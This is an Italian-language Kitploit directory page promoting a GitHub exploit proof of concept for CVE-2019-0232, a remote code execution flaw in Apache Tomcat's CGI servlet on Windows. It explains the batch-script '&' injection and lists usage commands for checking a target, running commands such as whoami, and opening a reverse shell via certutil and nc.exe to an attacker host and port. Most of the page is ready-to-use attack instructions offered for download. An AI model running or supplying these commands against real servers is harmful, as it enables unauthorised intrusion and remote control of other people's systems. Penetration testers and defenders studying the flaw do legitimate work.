Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-0232 — CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - Exploit PoC | Kitploit
Strumenti/GitHubGitHub/yuzuki-ayanami/cve-2019-0232
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubyuzuki-ayanami/cve-2019-0232

CVE-2019-0232

CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - Exploit PoC

Vedi Repository
1121 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
tomcat

CVE-2019-0232

Apache Tomcat CGIServlet enableCmdLineArguments RCE

Iniezione di script batch di Windows tramite argomenti della query string

Descrizione

Apache Tomcat con il servlet CGI abilitato e enableCmdLineArguments=true passa i parametri della query string come argomenti da riga di comando agli script CGI. Su Windows, i file batch (.bat/.cmd) interpretano & come separatore di comandi, consentendo l'esecuzione arbitraria di comandi tramite un URL appositamente predisposto.

Prerequisiti

  • Servlet CGI abilitata in conf/web.xml o WEB-INF/web.xml
  • enableCmdLineArguments=true nei parametri di init della servlet CGI
  • Uno script CGI (es. ism.bat) distribuito e accessibile
  • Target Windows (i file batch sono necessari per l'iniezione tramite &)
  • Utilizzo

    root@kitploit:~
    git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
    cd CVE-2019-0232
    pip install -r requirements.txt
    

    Verifica se l'endpoint CGI esiste:

    root@kitploit:~
    python cve-2019-0232.py check -t http://target:8080
    python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat
    

    Esegui un comando:

    root@kitploit:~
    python cve-2019-0232.py exec -t http://target:8080 -c whoami
    python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'
    

    Reverse shell (certutil a 2 stadi + nc.exe):

    root@kitploit:~
    python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444
    

    Requisiti

    • Python 3.8+
    • requests
    • Target Windows (la vulnerabilità è specifica del sistema operativo)
    Scarica lo strumento